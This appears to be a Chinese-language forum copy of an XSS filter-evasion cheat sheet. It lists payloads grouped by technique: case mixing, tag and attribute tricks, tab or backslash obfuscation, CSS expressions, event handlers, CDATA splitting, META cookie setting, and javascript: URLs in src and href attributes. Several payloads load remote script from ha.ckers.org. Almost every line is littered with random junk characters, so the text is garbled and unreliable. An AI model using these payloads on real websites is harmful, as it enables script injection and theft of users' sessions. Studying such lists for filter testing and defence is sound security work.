1. 改变字符大小写
3 d S; T' {, ~9 z
/ a7 L" L, t( ]9 F
- H5 ^! U" u+ s' q( L/ H' S" V! B6 o0 }1 N- a; z
<sCript>alert(‘d’)</scRipT>
: ^# q$ o4 G3 v
& ]! m u1 F6 x) J2. 利用多加一些其它字符来规避Regular Expression的检查( N. z; B; m- S, ]3 v9 \; ~
* w- B! g* G2 @
<<script>alert(‘c’)//<</script>- T- k0 E5 h- L: i S8 t
0 f* A, v1 H6 J5 `2 a' `
<SCRIPT a=">" SRC="t.js"></SCRIPT>4 P' f7 t9 |9 i4 L# w6 E* ?
' o/ y2 ?. R" f <SCRIPT =">" SRC="t.js"></SCRIPT>
- E" Z# O8 D- g' O. y& [* }) f5 S: E* s. A$ X0 z( \
<SCRIPT a=">" ” SRC="t.js"></SCRIPT>) ?; J7 W1 o8 h5 j
2 a) O" U5 w; u. ~ <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>1 ~8 N/ h- Z) s. u& b+ P/ e
1 `' A" @$ j. c% Y( f$ p3 t <SCRIPT a=`>` SRC="t.js"></SCRIPT>
# e. ]. K6 J. D
/ K2 F9 e9 F3 `% j <SCRIPT a=">’>" SRC="t.js"></SCRIPT>1 N6 M+ w! }) e2 o
7 ~. @3 k+ Q0 t: g! ]' p
3. 以其它扩展名取代.js
3 W Y4 m9 {3 @: D/ x
: y( Q! F9 z. ?* L1 r0 c( T <script src="bad.jpg"></script>
) `+ V- Y4 F8 r: d' _) i" e
; N; g7 O* M2 U' {; r4. 将Javascript写在CSS档里
$ i5 j. r7 H1 K: Z+ g1 z5 [: D/ q9 q6 ~$ Y
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">$ x z8 e# l4 G; `( I* x/ f- L
* M- l# _( b5 p* p, w2 {
example:& h- ^' ]# H5 K) e' C1 s! k
0 u7 q4 ~4 g1 I# ~' D. Z9 l body {1 X, R. M( h9 c! E
9 w, [1 H$ h6 O* |3 X" E, b$ L2 Q background-image: url(‘javascript:alert("XSS");’)+ i) g0 P& c, \0 x7 u7 h; A! j
0 v2 V9 A6 u4 z# @* l- e' r. Q }
- a1 e$ x" Y& Y# W- U! v7 G @0 c& s' V& ^
5. 在script的tag里加入一些其它字符- M! K; u A U7 G; `/ J* E
. x9 l6 S3 E p# W <SCRIPT/SRC="t.js"></SCRIPT>8 R/ V" g! \7 U% s, A
/ W5 _, n# c+ l# ^! G
<SCRIPT/anyword SRC="t.js"></SCRIPT>* v* O2 s$ }/ G+ M% H. S3 Y
' H6 w- g/ a3 X" `- T r6. 使用tab或是new line来规避
$ l0 l0 M6 o$ }7 X3 a$ y& W0 C7 y) W( o) z& Q: B" [
<img src="jav ascr ipt:alert(‘XSS3′)">8 _. H: g% B0 d
9 Q3 \% d$ O/ N* `
<img src="jav ascr ipt:alert(‘XSS3′)">9 V' M, ^# I, ]( v6 |& J
2 t7 o4 Q* q6 z) _ <IMG SRC="jav ascript:alert(‘XSS’);">
0 m6 g6 T$ N6 b/ d) s4 ]- f, U+ R8 I! k& R2 o
-> tag/ q+ E! X. Q2 L4 ]. l1 w
$ J: L6 P3 b' M0 X, _
-> new line
; u, D, g% W7 W1 i8 O1 [; y, A/ D# f" V
) h/ x# R5 q' i8 w7. 使用"\"来规避/ ~! p5 p0 b* H6 A: B
8 E( d# W) H0 r+ m# v
<STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>. d4 M, }9 R. O+ e
; i& C- T$ `( M# y; b/ y: Q) v <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
& p w: j# }# I% z/ C1 O: ]: @, I" k+ f) ^ b; ~. o
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">7 O) C( [. A. N2 G/ z4 @( l2 x# X
( J. E3 ~: o( k$ h6 [ <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">( s& f# z7 j. Q( T/ j" K( j4 s
* u3 d$ f) k' l3 C8 l <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>" G5 b. p" h0 Z( s. E5 A9 X
6 ^7 v# K. v6 X; H7 _3 t8 j
8. 使用Hex encode来规避(也可能会把";"拿掉)6 t& `$ r) p( \; T+ S) M
$ M' m& [' ^/ Y, o6 | <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">' b, s1 v+ F2 y% @; v
( E5 X; ?, T9 Q 原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">: m, c% K7 }9 q
0 n5 s \( P3 E, ^* S8 T <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">+ M5 I% \; v/ r( |) X0 v1 i
/ X: J. m! `( i2 U! [. w 原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">. ~! ]' Q7 _& g4 }
9 o9 u9 j5 `! X4 K6 o! |9. script in HTML tag
* r* B/ \7 |$ |% U( q7 f1 b+ g! Y+ u" [7 d+ }" B1 Y( o) s
<body onload=」alert(‘onload’)」>7 N6 L: I; ^; r
( c: }7 I3 c5 |: Y9 r' l6 A
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload6 u7 V1 f) w. P0 P1 @: D
) i+ B% _$ m2 g6 J
10. 在swf里含有xss的code9 i4 {5 |' p/ @$ W
0 W1 v( e9 f9 j! Y' W1 N <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
7 g- Y, V7 A* J1 U8 ~ i7 s, U/ D; k3 X% o- v5 S
11. 利用CDATA将xss的code拆开,再组合起来。
- [: i, l' l2 y6 L9 T% v2 K2 H
) x' F9 A) X m <XML ID=I><X><C>3 ?; I# U4 t) S, I
5 p" N5 o& g1 E h8 A: _8 t' D <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
1 j( i# [( d6 v* ^% |$ M* m# b6 ^4 ~$ V h) `+ Y
</C></X>) v! n0 i3 y1 f+ a( Q
, H% B1 A1 h U, t
</xml>
/ Z, t' H3 }6 G) E# F2 _4 f4 O$ J9 I
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
7 C) ~ d2 H0 @$ X* L7 Z- @& W1 ~) `& M' i' M) y
<XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>. l3 Z8 i/ I7 s4 n0 n I
4 y' D: p5 N( _! L7 j
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
! V! b: Y7 ?; P& z: y* Q4 @+ r- R/ a( v' Q! N. S$ q
12. 利用HTML+TIME。
; {( G ^* R+ u% c+ `- H$ L
+ B* Q h' \1 G! w6 q, Y4 O- k; p <HTML><BODY>2 C2 W/ } ]3 t8 i
+ n+ O* ?/ E2 W! V; r
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
6 W# ^6 l p3 m' N: y: P. |+ E' o0 y2 V# e3 e* o
<?import namespace="t" implementation="#default#time2">
1 t1 @% i6 c7 a4 o/ E
7 H6 `) T5 ` b3 H4 e" j <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
7 W" T1 A3 G2 @+ C3 E
0 w+ y* N$ ^1 V9 D- I </BODY></HTML>" ?; [3 ~. \+ t: w
8 f4 W& D6 s/ s9 a& ^
13. 透过META写入Cookie。
/ q5 I3 f& \4 H# }
# @0 E5 q; r: b" q% b5 j- z) S <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
1 _& }* t% `/ ~9 ]5 p
1 C4 L. n. e) t$ B* N14. javascript in src , href , url/ O$ v- k) V2 B* i) W9 f% y
# y/ P8 w6 V: j' W" {- r
<IFRAME SRC=javascript:alert(’13′)></IFRAME>) U5 @: Q& w% u' t& }0 [
, k; s! _8 R1 `6 A! ` <img src="javascript:alert(‘XSS3′)">6 A5 J( v5 I S
?- E9 L3 Y7 ?" [5 H
<IMG DYNSRC="javascript:alert(‘XSS20′)">
# r! a2 T9 u" P
/ x) g. f/ P, @5 H5 M <IMG LOWSRC="javascript:alert(‘XSS21′)">
) b( {9 U6 F2 \5 {4 d! E
# n$ k* f! d: L! o3 Y+ n <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
' E. f* s9 C1 ~0 ^! F+ e- w0 k0 u) F6 M/ Q o* S2 ]
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
/ h: c1 a4 p8 M: X
/ _; e2 c k L! Y7 {7 ~( [: V6 u8 R8 @ <TABLE BACKGROUND="javascript:alert(‘XSS29′)">4 f( @" A2 y8 c) m- s2 Q/ @
! F* i1 }8 \+ Q- j <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
3 S* G4 e( F$ e; O. B/ ?# E c, j: ^" Y. O: ?+ H: l5 A
<STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
+ {! J7 x6 K# R9 F& `& `* |6 J5 L0 L0 {) y- `
</STYLE><A CLASS=XSS></A>2 @8 u9 c3 d/ l; q) e
8 R1 a, b; L2 w) T
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
' J M( N0 ]0 @4 l; p2 U
& ~& K( d/ L" i& I% L7 Z; z |